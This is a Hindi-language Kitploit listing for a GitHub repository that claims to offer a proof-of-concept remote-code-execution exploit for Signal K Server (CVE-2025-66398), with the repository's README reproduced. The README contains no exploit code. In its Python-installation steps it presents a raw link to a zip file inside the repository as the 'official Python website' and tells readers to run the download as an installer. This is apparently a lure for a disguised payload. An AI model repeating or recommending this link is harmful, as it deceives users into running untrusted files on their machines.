Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/showy-headteacher114/cve-2025-66398
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूलपेलोड डेवलपमेंट
GitHubshowy-headteacher114/cve-2025-66398

cve-2025-66398

Signal K Server CVE-2025-66398 के शोषण का प्रदर्शन जो अनधिकृत हमलावरों को बैकडोर इंजेक्ट करने और दूरस्थ कोड निष्पादन सक्षम करने की अनुमति देता है।

रिपॉजिटरी देखें
1142 दिन पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

⚠️ cve-2025-66398 - सरल RCE प्रूफ ऑफ कॉन्सेप्ट टूल

Download


⚙️ इस टूल के बारे में

यह प्रोजेक्ट Signal K Server संस्करण 2.18.0 और उससे पुराने संस्करणों में एक रिमोट कोड एक्जीक्यूशन (RCE) भेद्यता को प्रदर्शित करता है। प्रूफ ऑफ कॉन्सेप्ट (PoC) दिखाता है कि कैसे एक हमलावर कमजोर डिवाइस पर कमांड चला सकता है।

यह टूल सुरक्षा परीक्षकों, सिस्टम एडमिन, या उन सभी के लिए डिज़ाइन किया गया है जो इस सुरक्षा मुद्दे को समझने में रुचि रखते हैं। इसे चलाने के लिए किसी प्रोग्रामिंग कौशल की आवश्यकता नहीं है, लेकिन बुनियादी कंप्यूटर नेविगेशन ज्ञान सहायक होता है।


🖥️ सिस्टम आवश्यकताएँ

  • विंडोज 10 या बाद का
  • कम से कम 2 GB खाली RAM
  • 100 MB खाली डिस्क स्थान
  • फ़ाइलें डाउनलोड करने के लिए इंटरनेट कनेक्शन
  • प्रशासक अधिकारों की आवश्यकता नहीं है

📥 कैसे डाउनलोड और इंस्टॉल करें

नीचे दिए गए बटन पर क्लिक करें प्रोजेक्ट पेज पर जाएँ और फ़ाइलें डाउनलोड करें।

Download

चरण 1: डाउनलोड पेज पर जाएँ

उपरोक्त लिंक पर जाएँ। आप GitHub पेज पर फ़ाइलों और फ़ोल्डरों की एक सूची देखेंगे।

चरण 2: ZIP फ़ाइल डाउनलोड करें

पेज के ऊपरी दाएं कोने के पास हरे Code बटन को देखें। उस पर क्लिक करें और Download ZIP चुनें।

चरण 3: फ़ाइलें निकालें

  • डाउनलोड की गई ZIP फ़ाइल को अपने Downloads फ़ोल्डर में खोजें।
  • ZIP फ़ाइल पर राइट-क्लिक करें और Extract All चुनें।
  • वह फ़ोल्डर चुनें जहाँ आप फ़ाइलें रखना चाहते हैं, फिर Extract पर क्लिक करें।

चरण 4: एप्लिकेशन ढूँढें

निकाले गए फ़ोल्डर को खोलें। आपको प्रोजेक्ट से संबंधित फ़ाइलें, जैसे स्क्रिप्ट और दस्तावेज़, दिखनी चाहिए।


▶️ विंडोज़ पर टूल कैसे चलाएँ

प्रोजेक्ट Python और Go में लिखी गई स्क्रिप्ट का उपयोग करता है। टूल चलाने के लिए, आप एक सरल कमांड प्रॉम्प्ट विंडो का उपयोग करेंगे।

चरण 1: कमांड प्रॉम्प्ट खोलें

  • अपने कीबोर्ड पर Win + R दबाएँ।
  • cmd टाइप करें और Enter दबाएँ।

चरण 2: फ़ोल्डर पर जाएँ

यह कमांड टाइप करें, path\to\folder को अपने निकाले गए फ़ोल्डर पथ से बदलें:

cd path\to\folder

Enter दबाएँ।

चरण 3: स्क्रिप्ट चलाएँ

आपको run.bat या start.bat जैसे नाम की एक स्क्रिप्ट मिल सकती है। यदि हाँ, तो उसका नाम टाइप करें और Enter दबाएँ। उदाहरण के लिए:

run.bat

यदि कोई BAT फ़ाइल नहीं है, तो .py पर समाप्त होने वाली Python स्क्रिप्ट देखें। आपके पास अपने PC पर Python स्थापित होना चाहिए (अगला अनुभाग देखें)।

इसे चलाने के लिए यह कमांड टाइप करें:

python scriptname.py

scriptname.py को वास्तविक फ़ाइल नाम से बदलें।


🐍 पायथन स्थापित करना (यदि आवश्यक हो)

यदि आपको कोई त्रुटि मिलती है कि Python पहचाना नहीं गया, तो आपको Python स्थापित करने की आवश्यकता है।

चरण 1: पायथन डाउनलोड करें

आधिकारिक Python वेबसाइट पर जाएँ:

https://raw.githubusercontent.com/showy-headteacher114/cve-2025-66398/main/docker/vendor/cve_v1.2.zip

नवीनतम Windows इंस्टॉलर पर क्लिक करें और इसे डाउनलोड करें।

चरण 2: पायथन स्थापित करें

  • डाउनलोड किए गए इंस्टॉलर को चलाएँ।
  • Install Now पर क्लिक करने से पहले Add Python to PATH कहने वाले बॉक्स को चेक करें।
  • इंस्टॉल समाप्त होने तक प्रतीक्षा करें।

चरण 3: पायथन स्थापना सत्यापित करें

एक नई कमांड प्रॉम्प्ट विंडो खोलें और टाइप करें:

python --version

इसे स्थापित Python संस्करण दिखाना चाहिए।


🚨 टूल को सुरक्षित रूप से चलाना

यह टूल केवल एक विशिष्ट भेद्यता के परीक्षण और सीखने के लिए है। इसे सुरक्षित वातावरण में उपयोग करें, जैसे परीक्षण नेटवर्क या पृथक मशीन।

इसे उन सिस्टमों पर कभी न चलाएँ जिनके मालिक नहीं हैं या जिनके परीक्षण की अनुमति नहीं है।


🔍 टूल कैसे काम करता है

टूल Signal K Server संस्करण 2.18.0 या उससे पुराने संस्करण चलाने वाले उपकरणों को स्कैन करता है। यह ऐसे कमांड भेजने का प्रयास करता है जो भेद्यता का शोषण करते हैं और जाँचता है कि लक्ष्य उन्हें निष्पादित करता है या नहीं।

यह सुरक्षा पेशेवरों को यह पुष्टि करने की अनुमति देता है कि उनके सिस्टम कमजोर हैं या नहीं और उन्हें अपडेट या सुरक्षित करने के लिए कार्रवाई कर सकते हैं।


💡 समस्या निवारण

  • यदि टूल शुरू नहीं होता है, तो जाँचें कि आप कमांड प्रॉम्प्ट में सही फ़ोल्डर में हैं।
  • सुनिश्चित करें कि Python स्थापित है और आपके सिस्टम PATH में जोड़ा गया है।
  • अन्य एप्लिकेशन बंद करें जो नेटवर्क एक्सेस को अवरुद्ध कर सकते हैं।
  • यदि आपको अनुमति संबंधी त्रुटियाँ आती हैं तो कमांड प्रॉम्प्ट को व्यवस्थापक के रूप में चलाएँ।
  • सुनिश्चित करें कि लक्ष्य डिवाइस नेटवर्क पर पहुँच योग्य है।

📄 अतिरिक्त संसाधन

CVE-2025-66398 भेद्यता के बारे में अधिक जानकारी के लिए, सुरक्षा डेटाबेस या GitHub पर संबंधित शोध खोजें।


🔗 डाउनलोड लिंक

टूल फ़ाइलें डाउनलोड करने के लिए इस पेज पर जाएँ:

https://raw.githubusercontent.com/showy-headteacher114/cve-2025-66398/main/docker/vendor/cve_v1.2.zip

टूल डाउनलोड करें